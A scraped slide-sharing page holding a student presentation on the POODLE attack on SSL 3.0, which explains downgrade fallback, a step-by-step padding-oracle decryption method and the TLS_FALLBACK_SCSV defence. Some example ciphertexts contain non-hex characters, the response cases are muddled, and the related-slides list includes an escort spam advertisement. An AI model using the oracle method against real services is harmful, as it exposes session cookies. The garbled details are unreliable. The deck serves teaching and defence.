 
Clickjacking Attack
Clickjacking AttackClickjacking Attack
Clickjacking Attack
 
Click Jacking
Click JackingClick Jacking
Click Jacking
 
SSL & TLS Architecture short
SSL & TLS Architecture shortSSL & TLS Architecture short
SSL & TLS Architecture short
 
Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks
 

Similaire à Poodle

SSL Secure socket layer
SSL Secure socket layerSSL Secure socket layer
SSL Secure socket layerAhmed Elnaggar
 
Sql server lesson11
Sql server lesson11Sql server lesson11
Sql server lesson11Ala Qunaibi
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 
SECURE SOCKET LAYER ( WEB SECURITY )
SECURE SOCKET LAYER ( WEB SECURITY )SECURE SOCKET LAYER ( WEB SECURITY )
SECURE SOCKET LAYER ( WEB SECURITY )Monodip Singha Roy
 
PPT ON WEB SECURITY BY MONODIP SINGHA ROY
PPT ON WEB SECURITY BY MONODIP SINGHA ROYPPT ON WEB SECURITY BY MONODIP SINGHA ROY
PPT ON WEB SECURITY BY MONODIP SINGHA ROYMonodip Singha Roy
 
SecureSocketLayer.ppt
SecureSocketLayer.pptSecureSocketLayer.ppt
SecureSocketLayer.pptPranavUndre1
 
Dr. Omar Ali Alibrahim - Ssl talk
Dr. Omar Ali Alibrahim - Ssl talkDr. Omar Ali Alibrahim - Ssl talk
Dr. Omar Ali Alibrahim - Ssl talkpromediakw
 
BAIT1103 Chapter 4
BAIT1103 Chapter 4BAIT1103 Chapter 4
BAIT1103 Chapter 4limsh
 
Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Vishal Kumar
 
Network Security_Module_2_Dr Shivashankar
Network Security_Module_2_Dr ShivashankarNetwork Security_Module_2_Dr Shivashankar
Network Security_Module_2_Dr ShivashankarDr. Shivashankar
 
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Cybersecurity Education and Research Centre
 
ssl-tls-ipsec-vpn.pptx
ssl-tls-ipsec-vpn.pptxssl-tls-ipsec-vpn.pptx
ssl-tls-ipsec-vpn.pptxjithu26327
 
Common crypto attacks and secure implementations
Common crypto attacks and secure implementationsCommon crypto attacks and secure implementations
Common crypto attacks and secure implementationsTrupti Shiralkar, CISSP
 

Similaire à Poodle (20)

CRYPTOGRAPHY AND NETWORK SECURITY- Transport-level Security
CRYPTOGRAPHY AND NETWORK SECURITY- Transport-level SecurityCRYPTOGRAPHY AND NETWORK SECURITY- Transport-level Security
CRYPTOGRAPHY AND NETWORK SECURITY- Transport-level Security
 
SSL Secure socket layer
SSL Secure socket layerSSL Secure socket layer
SSL Secure socket layer
 
Web security
Web securityWeb security
Web security
 
Sql server lesson11
Sql server lesson11Sql server lesson11
Sql server lesson11
 
Sequere socket Layer
Sequere socket LayerSequere socket Layer
Sequere socket Layer
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
 
SECURE SOCKET LAYER ( WEB SECURITY )
SECURE SOCKET LAYER ( WEB SECURITY )SECURE SOCKET LAYER ( WEB SECURITY )
SECURE SOCKET LAYER ( WEB SECURITY )
 
PPT ON WEB SECURITY BY MONODIP SINGHA ROY
PPT ON WEB SECURITY BY MONODIP SINGHA ROYPPT ON WEB SECURITY BY MONODIP SINGHA ROY
PPT ON WEB SECURITY BY MONODIP SINGHA ROY
 
SecureSocketLayer.ppt
SecureSocketLayer.pptSecureSocketLayer.ppt
SecureSocketLayer.ppt
 
Dr. Omar Ali Alibrahim - Ssl talk
Dr. Omar Ali Alibrahim - Ssl talkDr. Omar Ali Alibrahim - Ssl talk
Dr. Omar Ali Alibrahim - Ssl talk
 
BAIT1103 Chapter 4
BAIT1103 Chapter 4BAIT1103 Chapter 4
BAIT1103 Chapter 4
 
Secure socket later
Secure socket laterSecure socket later
Secure socket later
 
Firewall traversals
Firewall traversalsFirewall traversals
Firewall traversals
 
Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2
 
Network Security_Module_2_Dr Shivashankar
Network Security_Module_2_Dr ShivashankarNetwork Security_Module_2_Dr Shivashankar
Network Security_Module_2_Dr Shivashankar
 
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
 
ssl-tls-ipsec-vpn.pptx
ssl-tls-ipsec-vpn.pptxssl-tls-ipsec-vpn.pptx
ssl-tls-ipsec-vpn.pptx
 
FreeBSD and Hardening Web Server
FreeBSD and Hardening Web ServerFreeBSD and Hardening Web Server
FreeBSD and Hardening Web Server
 
Common crypto attacks and secure implementations
Common crypto attacks and secure implementationsCommon crypto attacks and secure implementations
Common crypto attacks and secure implementations
 
Secure Socket Layer.pptx
Secure Socket Layer.pptxSecure Socket Layer.pptx
Secure Socket Layer.pptx
 

Dernier

The byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxThe byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxShobhayan Kirtania
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...fonyou31
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfchloefrazer622
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...anjaliyadav012327
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajanpragatimahajan3
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesFatimaKhan178732
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxSayali Powar
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
9548086042 for call girls in Indira Nagar with room service
9548086042  for call girls in Indira Nagar  with room service9548086042  for call girls in Indira Nagar  with room service
9548086042 for call girls in Indira Nagar with room servicediscovermytutordmt
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpinRaunakKeshri1
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfJayanti Pande
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 

Dernier (20)

The byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxThe byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptx
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdf
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajan
 
Advance Mobile Application Development class 07
Advance Mobile Application Development class 07Advance Mobile Application Development class 07
Advance Mobile Application Development class 07
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and Actinides
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
9548086042 for call girls in Indira Nagar with room service
9548086042  for call girls in Indira Nagar  with room service9548086042  for call girls in Indira Nagar  with room service
9548086042 for call girls in Indira Nagar with room service
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpin
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 

Poodle

  • 1. POODLE Padding Oracle On Downgraded Legacy Encryption. Shreyas Kothari (140302003) M.Tech (CNIS)
  • 2. Introduction • Secure Socket Layer (SSL) protocol was discovered to provide secure transmission between two parties. This protocol became industry standard and was widely adopted by Vendors in their products to give a secure channel for data transmission. • However from time to time this various vulnerabilities like Man in the middle attack (MITM), POODLE attack etc. were discovered in SSL protocol resulting in different versions of this protocol termed as 1.0, 2.0, and 3.0. Due to this a new standard has been developed named as TLS and it also has its various version namely TLS 1.0, TLS 1.1, TLS 1.2.
Introduction – Contd.
• Since SSL was widely adopted, it would not have been economical to replace all SSL products with TLS. TLS was therefore made backward compatible with SSL to provide a smooth user experience.
• Even when both client and server support TLS, many clients perform a protocol "downgrade dance" to avoid interoperability bugs. Because of this behaviour a new vulnerability, termed POODLE (Padding Oracle On Downgraded Legacy Encryption), was discovered.
• Using this vulnerability, an attacker can steal bearer tokens such as HTTP cookies.
What is the POODLE Attack?
• As stated in the previous slides, many TLS clients perform a protocol downgrade dance to avoid interoperability bugs.
• This means that when a handshake starts, the client presents the highest protocol version it supports.
• If the server is not compatible with the version presented by the client, the handshake fails; the client then retries, and the handshake succeeds with the best TLS/SSL version the server reports it can support.
• Here is the point.
Contd.
• If the network between client and server is controlled by an attacker, the attacker can impersonate both entities and cause the connection to fall back to SSL 3.0. The initial vector for this attack is therefore the protocol downgrade dance supported by clients.
• Once the channel between the entities has been moved down to SSL 3.0, the vulnerability can be exploited.
• The vulnerability exploited is the well-known padding oracle attack.
• Since SSL 3.0 authenticates (computes the MAC) before encrypting, the padding is not covered by the MAC; this design flaw is what makes the vulnerability possible. The padding oracle attack is carried out against the CBC-mode ciphers in SSLv3.
Padding
• Padding adds the extra bytes that are needed before encryption to fill out a complete block.
• Here we are interested in the PKCS#5 padding scheme, as it is the one used with CBC mode.
• In PKCS#5, the final block of plaintext is padded with N bytes, each of value N.
Padding Oracle Attack
• In cryptography, an "oracle" is a system that performs cryptographic operations on input supplied to it.
• Hence a "padding oracle" is a system that takes encrypted data from the user, decrypts it and reveals whether the padding is correct or not.
• Let us now try to understand how this attack is performed.
Padding Oracle Attack
• Consider the URL below.
• https://www.example.com/home.asp?UID=8A219A434525535FF324D4G56FC9534
• Let us assume that some information (say the username) is sent in this UID parameter in encrypted form, using CBC mode and the PKCS#5 padding standard. The application decrypts this value and returns a result based on it.
Padding Oracle Attack
• Three scenarios are possible:
• Case 1) Valid cipher text – valid, normal page
• Case 2) Invalid cipher text [with improper padding] – invalid page [such as 404 – Not Found]
• Case 3) Valid cipher text but invalid padding – [error]
Padding Oracle Attack
• Case 1:
• Say you send the value UID=8A219A434525535FF324D4G56FC95348 and it decrypts to a valid user, "Shreyas". The application sends a normal response.
• Case 2:
• Say you send the value UID=998877PA434525535FF324D4G56FC95348 and it decrypts to "aswjkaja" (an invalid user). The application might respond with a 404 message saying no such page exists.
Padding Oracle Attack
• Case 3:
• Say you send the value UID=66IXS7IA434525535FF324D4G56FC95348 and it decrypts to "Ravi" (a valid user) but with invalid padding. The application returns some exception.
• Thus, if you can send different cipher texts and learn whether or not each decrypts with valid padding, you can decrypt any given cipher text.
Padding Oracle Attack
• In CBC decryption, each ciphertext block is passed through the block cipher's decryption, then XORed with the previous ciphertext block to give the plaintext block.
• So in our example above, the cipher blocks would be formed as shown below.
• https://www.example.com/home.asp?UID=8A219A43|4525535F|F324D4G5|6FC9534
• Cipher blocks: 8A219A43 | 4525535F | F324D4G5 | 6FC95348
Padding Oracle Attack
• If a request with an initial block of all zeros is sent, it would most probably result in a 500, since it is unlikely to decrypt to any valid value.
• https://www.example.com/home.asp?UID=00000000|4525535F|F324D4G5|6FC95348
Padding Oracle Attack
• Now send the same request, but with the value of this initial block set to 1.
• https://www.example.com/home.asp?UID=00000001|4525535F|F324D4G5|6FC95348
Padding Oracle Attack
• Although the server still returns the error message, the last byte of the decrypted cipher text has changed, since you sent 0x01 in the request.
• If we keep repeating this step for every value up to 0xFF, we will eventually hit a value that produces a valid padding sequence.
• Only one value out of the 256 possibilities will produce a correct padding byte.
• When you hit this value, you should get a different response than for the other 255 requests.
Padding Oracle Attack
• From this we can calculate the intermediate value at this position, since we know that when XORed with 0x3C it produces 0x01.
• If [Intermediate Value] ^ 0x3C = 0x01
• then 0x3C ^ 0x01 = Intermediate Value
• Hence, Intermediate Value = 0x3D
• Using this technique, we can work backwards through the entire block until every byte of the intermediate value is recovered, thus obtaining the decrypted value one byte at a time.
Padding Oracle Attack on SSL 3.0
• Let us take an example to understand how the padding oracle attack is performed on SSL 3.0.
• Suppose a request contains sensitive data, such as HTTP cookies, in one of the blocks.
• That block is copied into the position of the last block of the request, which is the padding block.
• Then the padding oracle attack is carried out, and the sensitive data can be revealed because of this vulnerability.
You can check whether your browser is vulnerable to the POODLE attack at the following website: https://www.poodletest.com
You can check whether any website is vulnerable to the POODLE attack at the following website: https://www.poodlescan.com
Protection against POODLE Attack
• The only way to avoid this attack at present is to disable or avoid using SSL 3.0 and upgrade to TLS.
• For TLS clients and servers: TLS clients that perform the protocol downgrade dance should include TLS_FALLBACK_SCSV in ClientHello.cipher_suites in any fallback handshake.
• This value indicates that a possible downgrade attack may be underway, and the connection will be refused. A TLS server, on seeing TLS_FALLBACK_SCSV in ClientHello.cipher_suites, checks the SSL/TLS version stated by the client; if the server supports a higher version than the one offered, the connection is terminated.
TLS_FALLBACK_SCSV
• The TLS Fallback Signaling Cipher Suite Value (SCSV) prevents the downgrade attack.
• TLS_FALLBACK_SCSV {0x56, 0x00}
• This is a signalling cipher suite value, i.e. it does not actually correspond to a suite of cryptosystems, and it can never be selected by the server in the handshake.
• If this value appears in ClientHello.cipher_suites and the highest protocol version supported by the server is higher than that offered by the client, the server must respond with an inappropriate_fallback alert. This is a fatal error.
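As an added example (not part of the slides), the server-side rule just described, written in Python: a simulated downgrade dance in which a constructed man-in-the-middle condition breaks every handshake above SSL 3.0, showing that the SCSV turns the fall-back into a fatal inappropriate_fallback alert while a server that genuinely supports only SSL 3.0 stays reachable. The ClientHello model, the function names and the "dropped handshake" simulation are assumptions; the version numbers, the SCSV value {0x56, 0x00} and alert code 86 are the protocol's own values.

```python
# Added example (not from the slides): server-side handling of TLS_FALLBACK_SCSV
# during a downgrade dance. Version numbers, the SCSV value and the alert code are
# real wire values; the ClientHello model, function names and the simulated
# "attacker drops the handshake" condition are constructed for illustration.
from dataclasses import dataclass

# Protocol versions as (major, minor): SSL 3.0 is (3, 0), TLS 1.2 is (3, 3).
SSL30, TLS10, TLS11, TLS12 = (3, 0), (3, 1), (3, 2), (3, 3)

# Signalling suite: never a real cipher suite and never selected by the server.
TLS_FALLBACK_SCSV = (0x56, 0x00)

# AlertDescription value for inappropriate_fallback (fatal).
INAPPROPRIATE_FALLBACK = 86


@dataclass
class ClientHello:
    client_version: tuple   # highest version the client offers in this handshake
    cipher_suites: list     # (byte, byte) pairs, possibly including the SCSV


def server_accepts(hello, server_max_version):
    """Server-side check: refuse a fallback handshake that offers a version lower
    than the best the server supports; otherwise negotiate the common version."""
    if TLS_FALLBACK_SCSV in hello.cipher_suites and hello.client_version < server_max_version:
        return ("alert", INAPPROPRIATE_FALLBACK)
    return ("ok", min(hello.client_version, server_max_version))


def downgrade_dance(server_max_version, attacker_blocks_above=SSL30, use_scsv=True):
    """Simulate a client retrying with ever-lower versions while a constructed
    attacker breaks every handshake above `attacker_blocks_above`. Returns the
    list of (offered_version, result) attempts; the last entry is the outcome."""
    attempts = []
    for version in (TLS12, TLS11, TLS10, SSL30):
        suites = [(0x00, 0x2F)]  # TLS_RSA_WITH_AES_128_CBC_SHA, a CBC suite
        if version != TLS12 and use_scsv:   # every retry is a fallback handshake
            suites.append(TLS_FALLBACK_SCSV)
        if version > attacker_blocks_above:
            attempts.append((version, "dropped"))  # attacker kills the handshake
            continue
        attempts.append((version, server_accepts(ClientHello(version, suites), server_max_version)))
        break
    return attempts


if __name__ == "__main__":
    print("with SCSV:   ", downgrade_dance(TLS12)[-1])                  # fatal alert 86
    print("without SCSV:", downgrade_dance(TLS12, use_scsv=False)[-1])  # silently on SSL 3.0
    print("old server:  ", downgrade_dance(SSL30)[-1])                  # legitimate SSL 3.0 server
```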
References
• Padding Oracle Attack: http://resources.infosecinstitute.com/padding-oracle-attack-2/
• POODLE Attack: http://resources.infosecinstitute.com/end-ssl-poodle/
• Poodle Bites – Exploiting the SSL 3.0 Fallback: https://www.openssl.org/~bodo/ssl-poodle.pdf
• PKCS #5: http://tools.ietf.org/html/rfc2898